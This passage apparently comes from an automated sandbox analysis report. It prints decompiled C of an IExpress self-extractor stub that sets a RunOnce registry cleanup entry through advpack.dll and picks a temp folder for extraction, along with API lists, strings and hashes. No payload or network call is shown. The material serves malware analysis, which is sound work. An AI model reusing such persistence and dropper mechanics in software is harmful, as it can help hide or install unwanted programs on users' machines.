                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E008D202A(struct HINSTANCE__* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				char _v528;
                                                                                                                                                                                                                                            				void* _v532;
                                                                                                                                                                                                                                            				int _v536;
                                                                                                                                                                                                                                            				int _v540;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t28;
                                                                                                                                                                                                                                            				long _t36;
                                                                                                                                                                                                                                            				long _t41;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t46;
                                                                                                                                                                                                                                            				intOrPtr _t49;
                                                                                                                                                                                                                                            				intOrPtr _t50;
                                                                                                                                                                                                                                            				CHAR* _t54;
                                                                                                                                                                                                                                            				void _t56;
                                                                                                                                                                                                                                            				signed int _t66;
                                                                                                                                                                                                                                            				intOrPtr* _t72;
                                                                                                                                                                                                                                            				void* _t73;
                                                                                                                                                                                                                                            				void* _t75;
                                                                                                                                                                                                                                            				void* _t80;
                                                                                                                                                                                                                                            				intOrPtr* _t81;
                                                                                                                                                                                                                                            				void* _t86;
                                                                                                                                                                                                                                            				void* _t87;
                                                                                                                                                                                                                                            				void* _t90;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t91;
                                                                                                                                                                                                                                            				signed int _t93;
                                                                                                                                                                                                                                            				void* _t94;
                                                                                                                                                                                                                                            				void* _t95;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t79 = __edx;
                                                                                                                                                                                                                                            				_t28 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_v8 = _t28 ^ _t93;
                                                                                                                                                                                                                                            				_t84 = 0x104;
                                                                                                                                                                                                                                            				memset( &_v268, 0, 0x104);
                                                                                                                                                                                                                                            				memset( &_v528, 0, 0x104);
                                                                                                                                                                                                                                            				_t95 = _t94 + 0x18;
                                                                                                                                                                                                                                            				_t66 = 0;
                                                                                                                                                                                                                                            				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                                                                                                                                                                                            				if(_t36 != 0) {
                                                                                                                                                                                                                                            					L24:
                                                                                                                                                                                                                                            					return E008D6CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push(_t86);
                                                                                                                                                                                                                                            				_t87 = 0;
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					E008D171E("wextract_cleanup0", 0x50, "wextract_cleanup%d", _t87);
                                                                                                                                                                                                                                            					_t95 = _t95 + 0x10;
                                                                                                                                                                                                                                            					_t41 = RegQueryValueExA(_v532, "wextract_cleanup0", 0, 0, 0,  &_v540); // executed
                                                                                                                                                                                                                                            					if(_t41 != 0) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t87 = _t87 + 1;
                                                                                                                                                                                                                                            					if(_t87 < 0xc8) {
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					break;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t87 != 0xc8) {
                                                                                                                                                                                                                                            					GetSystemDirectoryA( &_v528, _t84);
                                                                                                                                                                                                                                            					_t79 = _t84;
                                                                                                                                                                                                                                            					E008D658A( &_v528, _t84, "advpack.dll");
                                                                                                                                                                                                                                            					_t46 = LoadLibraryA( &_v528); // executed
                                                                                                                                                                                                                                            					_t84 = _t46;
                                                                                                                                                                                                                                            					if(_t84 == 0) {
                                                                                                                                                                                                                                            						L10:
                                                                                                                                                                                                                                            						if(GetModuleFileNameA( *0x8d9a3c,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                            							L17:
                                                                                                                                                                                                                                            							_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                                                            							L23:
                                                                                                                                                                                                                                            							_pop(_t86);
                                                                                                                                                                                                                                            							goto L24;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						L11:
                                                                                                                                                                                                                                            						_t72 =  &_v268;
                                                                                                                                                                                                                                            						_t80 = _t72 + 1;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t49 =  *_t72;
                                                                                                                                                                                                                                            							_t72 = _t72 + 1;
                                                                                                                                                                                                                                            						} while (_t49 != 0);
                                                                                                                                                                                                                                            						_t73 = _t72 - _t80;
                                                                                                                                                                                                                                            						_t81 = 0x8d91e4;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t50 =  *_t81;
                                                                                                                                                                                                                                            							_t81 = _t81 + 1;
                                                                                                                                                                                                                                            						} while (_t50 != 0);
                                                                                                                                                                                                                                            						_t84 = _t73 + 0x50 + _t81 - 0x8d91e5;
                                                                                                                                                                                                                                            						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x8d91e5);
                                                                                                                                                                                                                                            						if(_t90 != 0) {
                                                                                                                                                                                                                                            							 *0x8d8580 = _t66 ^ 0x00000001;
                                                                                                                                                                                                                                            							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                                                                                                                                                                                            							if(_t66 == 0) {
                                                                                                                                                                                                                                            								_t54 = "%s /D:%s";
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_push("C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                                                            							E008D171E(_t90, _t84, _t54,  &_v268);
                                                                                                                                                                                                                                            							_t75 = _t90;
                                                                                                                                                                                                                                            							_t23 = _t75 + 1; // 0x1
                                                                                                                                                                                                                                            							_t79 = _t23;
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								_t56 =  *_t75;
                                                                                                                                                                                                                                            								_t75 = _t75 + 1;
                                                                                                                                                                                                                                            							} while (_t56 != 0);
                                                                                                                                                                                                                                            							_t24 = _t75 - _t79 + 1; // 0x2
                                                                                                                                                                                                                                            							RegSetValueExA(_v532, "wextract_cleanup0", 0, 1, _t90, _t24); // executed
                                                                                                                                                                                                                                            							RegCloseKey(_v532); // executed
                                                                                                                                                                                                                                            							_t36 = LocalFree(_t90);
                                                                                                                                                                                                                                            							goto L23;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t79 = 0x4b5;
                                                                                                                                                                                                                                            						E008D44B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                                                                                                                                                                                            						goto L17;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                                                                                                                                                                                            					_t66 = 0 | _t91 != 0x00000000;
                                                                                                                                                                                                                                            					FreeLibrary(_t84); // executed
                                                                                                                                                                                                                                            					if(_t91 == 0) {
                                                                                                                                                                                                                                            						goto L10;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                            						E008D658A( &_v268, 0x104, 0x8d1140);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                                                            				 *0x8d8530 = _t66;
                                                                                                                                                                                                                                            				goto L23;
                                                                                                                                                                                                                                            			}

































                                                                                                                                                                                                                                            0x008d202a
                                                                                                                                                                                                                                            0x008d2035
                                                                                                                                                                                                                                            0x008d203c
                                                                                                                                                                                                                                            0x008d2041
                                                                                                                                                                                                                                            0x008d2050
                                                                                                                                                                                                                                            0x008d205f
                                                                                                                                                                                                                                            0x008d2064
                                                                                                                                                                                                                                            0x008d206f
                                                                                                                                                                                                                                            0x008d208c
                                                                                                                                                                                                                                            0x008d2094
                                                                                                                                                                                                                                            0x008d2257
                                                                                                                                                                                                                                            0x008d2266
                                                                                                                                                                                                                                            0x008d2266
                                                                                                                                                                                                                                            0x008d209a
                                                                                                                                                                                                                                            0x008d209b
                                                                                                                                                                                                                                            0x008d209d
                                                                                                                                                                                                                                            0x008d20aa
                                                                                                                                                                                                                                            0x008d20af
                                                                                                                                                                                                                                            0x008d20c9
                                                                                                                                                                                                                                            0x008d20d1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d20d3
                                                                                                                                                                                                                                            0x008d20da
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d20da
                                                                                                                                                                                                                                            0x008d20e2
                                                                                                                                                                                                                                            0x008d2103
                                                                                                                                                                                                                                            0x008d210e
                                                                                                                                                                                                                                            0x008d2116
                                                                                                                                                                                                                                            0x008d2122
                                                                                                                                                                                                                                            0x008d2128
                                                                                                                                                                                                                                            0x008d212c
                                                                                                                                                                                                                                            0x008d2179
                                                                                                                                                                                                                                            0x008d2194
                                                                                                                                                                                                                                            0x008d21de
                                                                                                                                                                                                                                            0x008d21e4
                                                                                                                                                                                                                                            0x008d2256
                                                                                                                                                                                                                                            0x008d2256
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d2256
                                                                                                                                                                                                                                            0x008d2196
                                                                                                                                                                                                                                            0x008d2196
                                                                                                                                                                                                                                            0x008d219c
                                                                                                                                                                                                                                            0x008d219f
                                                                                                                                                                                                                                            0x008d219f
                                                                                                                                                                                                                                            0x008d21a1
                                                                                                                                                                                                                                            0x008d21a2
                                                                                                                                                                                                                                            0x008d21a6
                                                                                                                                                                                                                                            0x008d21a8
                                                                                                                                                                                                                                            0x008d21b0
                                                                                                                                                                                                                                            0x008d21b0
                                                                                                                                                                                                                                            0x008d21b2
                                                                                                                                                                                                                                            0x008d21b3
                                                                                                                                                                                                                                            0x008d21bc
                                                                                                                                                                                                                                            0x008d21c7
                                                                                                                                                                                                                                            0x008d21cb
                                                                                                                                                                                                                                            0x008d21f1
                                                                                                                                                                                                                                            0x008d21f6
                                                                                                                                                                                                                                            0x008d21fd
                                                                                                                                                                                                                                            0x008d21ff
                                                                                                                                                                                                                                            0x008d21ff
                                                                                                                                                                                                                                            0x008d2204
                                                                                                                                                                                                                                            0x008d2213
                                                                                                                                                                                                                                            0x008d2218
                                                                                                                                                                                                                                            0x008d221d
                                                                                                                                                                                                                                            0x008d221d
                                                                                                                                                                                                                                            0x008d2220
                                                                                                                                                                                                                                            0x008d2220
                                                                                                                                                                                                                                            0x008d2222
                                                                                                                                                                                                                                            0x008d2223
                                                                                                                                                                                                                                            0x008d2229
                                                                                                                                                                                                                                            0x008d223d
                                                                                                                                                                                                                                            0x008d2249
                                                                                                                                                                                                                                            0x008d2250
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d2250
                                                                                                                                                                                                                                            0x008d21d2
                                                                                                                                                                                                                                            0x008d21d9
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d21d9
                                                                                                                                                                                                                                            0x008d213a
                                                                                                                                                                                                                                            0x008d2141
                                                                                                                                                                                                                                            0x008d2144
                                                                                                                                                                                                                                            0x008d214c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d2163
                                                                                                                                                                                                                                            0x008d2172
                                                                                                                                                                                                                                            0x008d2172
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d2163
                                                                                                                                                                                                                                            0x008d20ea
                                                                                                                                                                                                                                            0x008d20f0
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 008D2050
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 008D205F
                                                                                                                                                                                                                                            • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 008D208C
                                                                                                                                                                                                                                              • Part of subcall function 008D171E: _vsnprintf.MSVCRT ref: 008D1750
                                                                                                                                                                                                                                            • RegQueryValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 008D20C9
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 008D20EA
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 008D2103
                                                                                                                                                                                                                                            • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 008D2122
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 008D2134
                                                                                                                                                                                                                                            • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 008D2144
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 008D215B
                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 008D218C
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 008D21C1
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 008D21E4
                                                                                                                                                                                                                                            • RegSetValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 008D223D
                                                                                                                                                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 008D2249
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 008D2250
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                                                            • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                                                                                                                                                                                                                                            • API String ID: 178549006-3726664654
                                                                                                                                                                                                                                            • Opcode ID: 0f6b85e4818443ba0e748f31a17fbe8df79093e171ad2d6b3a09967fba5923b1
                                                                                                                                                                                                                                            • Instruction ID: 621398109ca5c96675251e72901f36ca861cab889cec3be52ed70d50d82e3269
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0f6b85e4818443ba0e748f31a17fbe8df79093e171ad2d6b3a09967fba5923b1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4511471A01218EBDB249B64DC49FEA773CFF60700F1043A7FA59E3350EA759D898A60
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 232 8d55a0-8d55d9 call 8d468f LocalAlloc 235 8d55fd-8d560c call 8d468f 232->235 236 8d55db-8d55f1 call 8d44b9 call 8d6285 232->236 242 8d560e-8d5630 call 8d44b9 LocalFree 235->242 243 8d5632-8d5643 lstrcmpA 235->243 250 8d55f6-8d55f8 236->250 242->250 244 8d564b-8d5659 LocalFree 243->244 245 8d5645 243->245 248 8d565b-8d565d 244->248 249 8d5696-8d569c 244->249 245->244 252 8d565f-8d5667 248->252 253 8d5669 248->253 255 8d589f-8d58b5 call 8d6517 249->255 256 8d56a2-8d56a8 249->256 254 8d58b7-8d58c7 call 8d6ce0 250->254 252->253 257 8d566b-8d567a call 8d5467 252->257 253->257 255->254 256->255 260 8d56ae-8d56c1 GetTempPathA 256->260 270 8d589b-8d589d 257->270 271 8d5680-8d5691 call 8d44b9 257->271 264 8d56f3-8d5711 call 8d1781 260->264 265 8d56c3-8d56c9 call 8d5467 260->265 275 8d586c-8d5890 GetWindowsDirectoryA call 8d597d 264->275 276 8d5717-8d5729 GetDriveTypeA 264->276 269 8d56ce-8d56d0 265->269 269->270 273 8d56d6-8d56df call 8d2630 269->273 270->254 271->250 273->264 286 8d56e1-8d56ed call 8d5467 273->286 275->264 287 8d5896 275->287 280 8d572b-8d572e 276->280 281 8d5730-8d5740 GetFileAttributesA 276->281 280->281 284 8d5742-8d5745 280->284 281->284 285 8d577e-8d578f call 8d597d 281->285 289 8d576b 284->289 290 8d5747-8d574f 284->290 298 8d5791-8d579e call 8d2630 285->298 299 8d57b2-8d57bf call 8d2630 285->299 286->264 286->270 287->270 291 8d5771-8d5779 289->291 290->291 292 8d5751-8d5753 290->292 296 8d5864-8d5866 291->296 292->291 295 8d5755-8d5762 call 8d6952 292->295 295->289 308 8d5764-8d5769 295->308 296->275 296->276 298->289 309 8d57a0-8d57b0 call 8d597d 298->309 306 8d57c1-8d57cd GetWindowsDirectoryA 299->306 307 8d57d3-8d57f8 call 8d658a GetFileAttributesA 299->307 306->307 314 8d580a 307->314 315 8d57fa-8d5808 CreateDirectoryA 307->315 308->285 308->289 309->289 309->299 316 8d580d-8d580f 314->316 315->316 317 8d5827-8d585c SetFileAttributesA call 8d1781 call 8d5467 316->317 318 8d5811-8d5825 316->318 317->270 323 8d585e 317->323 318->296 323->296
                                                                                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                                                                                            			E008D55A0(void* __eflags) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v265;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t28;
                                                                                                                                                                                                                                            				int _t32;
                                                                                                                                                                                                                                            				int _t33;
                                                                                                                                                                                                                                            				int _t35;
                                                                                                                                                                                                                                            				signed int _t36;
                                                                                                                                                                                                                                            				signed int _t38;
                                                                                                                                                                                                                                            				int _t40;
                                                                                                                                                                                                                                            				int _t44;
                                                                                                                                                                                                                                            				long _t48;
                                                                                                                                                                                                                                            				int _t49;
                                                                                                                                                                                                                                            				int _t50;
                                                                                                                                                                                                                                            				signed int _t53;
                                                                                                                                                                                                                                            				int _t54;
                                                                                                                                                                                                                                            				int _t59;
                                                                                                                                                                                                                                            				char _t60;
                                                                                                                                                                                                                                            				int _t65;
                                                                                                                                                                                                                                            				char _t66;
                                                                                                                                                                                                                                            				int _t67;
                                                                                                                                                                                                                                            				int _t68;
                                                                                                                                                                                                                                            				int _t69;
                                                                                                                                                                                                                                            				int _t70;
                                                                                                                                                                                                                                            				int _t71;
                                                                                                                                                                                                                                            				struct _SECURITY_ATTRIBUTES* _t72;
                                                                                                                                                                                                                                            				int _t73;
                                                                                                                                                                                                                                            				CHAR* _t82;
                                                                                                                                                                                                                                            				CHAR* _t88;
                                                                                                                                                                                                                                            				void* _t103;
                                                                                                                                                                                                                                            				signed int _t110;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t28 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_v8 = _t28 ^ _t110;
                                                                                                                                                                                                                                            				_t2 = E008D468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                            				_t109 = LocalAlloc(0x40, _t2);
                                                                                                                                                                                                                                            				if(_t109 != 0) {
                                                                                                                                                                                                                                            					_t82 = "RUNPROGRAM";
                                                                                                                                                                                                                                            					_t32 = E008D468F(_t82, _t109, 1);
                                                                                                                                                                                                                                            					__eflags = _t32;
                                                                                                                                                                                                                                            					if(_t32 != 0) {
                                                                                                                                                                                                                                            						_t33 = lstrcmpA(_t109, "<None>");
                                                                                                                                                                                                                                            						__eflags = _t33;
                                                                                                                                                                                                                                            						if(_t33 == 0) {
                                                                                                                                                                                                                                            							 *0x8d9a30 = 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						LocalFree(_t109);
                                                                                                                                                                                                                                            						_t35 =  *0x8d8b3e; // 0x0
                                                                                                                                                                                                                                            						__eflags = _t35;
                                                                                                                                                                                                                                            						if(_t35 == 0) {
                                                                                                                                                                                                                                            							__eflags =  *0x8d8a24; // 0x0
                                                                                                                                                                                                                                            							if(__eflags != 0) {
                                                                                                                                                                                                                                            								L46:
                                                                                                                                                                                                                                            								_t101 = 0x7d2;
                                                                                                                                                                                                                                            								_t36 = E008D6517(_t82, 0x7d2, 0, E008D3210, 0, 0);
                                                                                                                                                                                                                                            								asm("sbb eax, eax");
                                                                                                                                                                                                                                            								_t38 =  ~( ~_t36);
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								__eflags =  *0x8d9a30; // 0x0
                                                                                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                                                                                            									goto L46;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t109 = 0x8d91e4;
                                                                                                                                                                                                                                            									_t40 = GetTempPathA(0x104, 0x8d91e4);
                                                                                                                                                                                                                                            									__eflags = _t40;
                                                                                                                                                                                                                                            									if(_t40 == 0) {
                                                                                                                                                                                                                                            										L19:
                                                                                                                                                                                                                                            										_push(_t82);
                                                                                                                                                                                                                                            										E008D1781( &_v268, 0x104, _t82, "A:\\");
                                                                                                                                                                                                                                            										__eflags = _v268 - 0x5a;
                                                                                                                                                                                                                                            										if(_v268 <= 0x5a) {
                                                                                                                                                                                                                                            											do {
                                                                                                                                                                                                                                            												_t109 = GetDriveTypeA( &_v268);
                                                                                                                                                                                                                                            												__eflags = _t109 - 6;
                                                                                                                                                                                                                                            												if(_t109 == 6) {
                                                                                                                                                                                                                                            													L22:
                                                                                                                                                                                                                                            													_t48 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                            													__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                                                            													if(_t48 != 0xffffffff) {
                                                                                                                                                                                                                                            														goto L30;
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														goto L23;
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													__eflags = _t109 - 3;
                                                                                                                                                                                                                                            													if(_t109 != 3) {
                                                                                                                                                                                                                                            														L23:
                                                                                                                                                                                                                                            														__eflags = _t109 - 2;
                                                                                                                                                                                                                                            														if(_t109 != 2) {
                                                                                                                                                                                                                                            															L28:
                                                                                                                                                                                                                                            															_t66 = _v268;
                                                                                                                                                                                                                                            															goto L29;
                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                            															_t66 = _v268;
                                                                                                                                                                                                                                            															__eflags = _t66 - 0x41;
                                                                                                                                                                                                                                            															if(_t66 == 0x41) {
                                                                                                                                                                                                                                            																L29:
                                                                                                                                                                                                                                            																_t60 = _t66 + 1;
                                                                                                                                                                                                                                            																_v268 = _t60;
                                                                                                                                                                                                                                            																goto L42;
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																__eflags = _t66 - 0x42;
                                                                                                                                                                                                                                            																if(_t66 == 0x42) {
                                                                                                                                                                                                                                            																	goto L29;
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	_t68 = E008D6952( &_v268);
                                                                                                                                                                                                                                            																	__eflags = _t68;
                                                                                                                                                                                                                                            																	if(_t68 == 0) {
                                                                                                                                                                                                                                            																		goto L28;
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		__eflags = _t68 - 0x19000;
                                                                                                                                                                                                                                            																		if(_t68 >= 0x19000) {
                                                                                                                                                                                                                                            																			L30:
                                                                                                                                                                                                                                            																			_push(0);
                                                                                                                                                                                                                                            																			_t103 = 3;
                                                                                                                                                                                                                                            																			_t49 = E008D597D( &_v268, _t103, 1);
                                                                                                                                                                                                                                            																			__eflags = _t49;
                                                                                                                                                                                                                                            																			if(_t49 != 0) {
                                                                                                                                                                                                                                            																				L33:
                                                                                                                                                                                                                                            																				_t50 = E008D2630(0,  &_v268, 1);
                                                                                                                                                                                                                                            																				__eflags = _t50;
                                                                                                                                                                                                                                            																				if(_t50 != 0) {
                                                                                                                                                                                                                                            																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																				_t88 =  &_v268;
                                                                                                                                                                                                                                            																				E008D658A(_t88, 0x104, "msdownld.tmp");
                                                                                                                                                                                                                                            																				_t53 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                            																				__eflags = _t53 - 0xffffffff;
                                                                                                                                                                                                                                            																				if(_t53 != 0xffffffff) {
                                                                                                                                                                                                                                            																					_t54 = _t53 & 0x00000010;
                                                                                                                                                                                                                                            																					__eflags = _t54;
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																				__eflags = _t54;
                                                                                                                                                                                                                                            																				if(_t54 != 0) {
                                                                                                                                                                                                                                            																					SetFileAttributesA( &_v268, 2);
                                                                                                                                                                                                                                            																					_push(_t88);
                                                                                                                                                                                                                                            																					_t109 = 0x8d91e4;
                                                                                                                                                                                                                                            																					E008D1781(0x8d91e4, 0x104, _t88,  &_v268);
                                                                                                                                                                                                                                            																					_t101 = 1;
                                                                                                                                                                                                                                            																					_t59 = E008D5467(0x8d91e4, 1, 0);
                                                                                                                                                                                                                                            																					__eflags = _t59;
                                                                                                                                                                                                                                            																					if(_t59 != 0) {
                                                                                                                                                                                                                                            																						goto L45;
                                                                                                                                                                                                                                            																					} else {
                                                                                                                                                                                                                                            																						_t60 = _v268;
                                                                                                                                                                                                                                            																						goto L42;
                                                                                                                                                                                                                                            																					}
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t60 = _v268 + 1;
                                                                                                                                                                                                                                            																					_v265 = 0;
                                                                                                                                                                                                                                            																					_v268 = _t60;
                                                                                                                                                                                                                                            																					goto L42;
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																			} else {
                                                                                                                                                                                                                                            																				_t65 = E008D2630(0,  &_v268, 1);
                                                                                                                                                                                                                                            																				__eflags = _t65;
                                                                                                                                                                                                                                            																				if(_t65 != 0) {
                                                                                                                                                                                                                                            																					goto L28;
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t67 = E008D597D( &_v268, 1, 1, 0);
                                                                                                                                                                                                                                            																					__eflags = _t67;
                                                                                                                                                                                                                                            																					if(_t67 == 0) {
                                                                                                                                                                                                                                            																						goto L28;
                                                                                                                                                                                                                                            																					} else {
                                                                                                                                                                                                                                            																						goto L33;
                                                                                                                                                                                                                                            																					}
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																			}
                                                                                                                                                                                                                                            																		} else {
                                                                                                                                                                                                                                            																			goto L28;
                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														goto L22;
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												goto L47;
                                                                                                                                                                                                                                            												L42:
                                                                                                                                                                                                                                            												__eflags = _t60 - 0x5a;
                                                                                                                                                                                                                                            											} while (_t60 <= 0x5a);
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										goto L43;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t101 = 1;
                                                                                                                                                                                                                                            										_t69 = E008D5467(0x8d91e4, 1, 3); // executed
                                                                                                                                                                                                                                            										__eflags = _t69;
                                                                                                                                                                                                                                            										if(_t69 != 0) {
                                                                                                                                                                                                                                            											goto L45;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											_t82 = 0x8d91e4;
                                                                                                                                                                                                                                            											_t70 = E008D2630(0, 0x8d91e4, 1);
                                                                                                                                                                                                                                            											__eflags = _t70;
                                                                                                                                                                                                                                            											if(_t70 != 0) {
